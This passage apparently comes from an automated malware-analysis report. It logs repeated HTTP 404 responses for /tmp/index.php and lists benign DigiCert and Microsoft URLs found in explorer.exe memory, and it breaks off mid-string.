Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000080F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000080F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000080F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000080F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1776956653.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1776433497.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1778850538.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
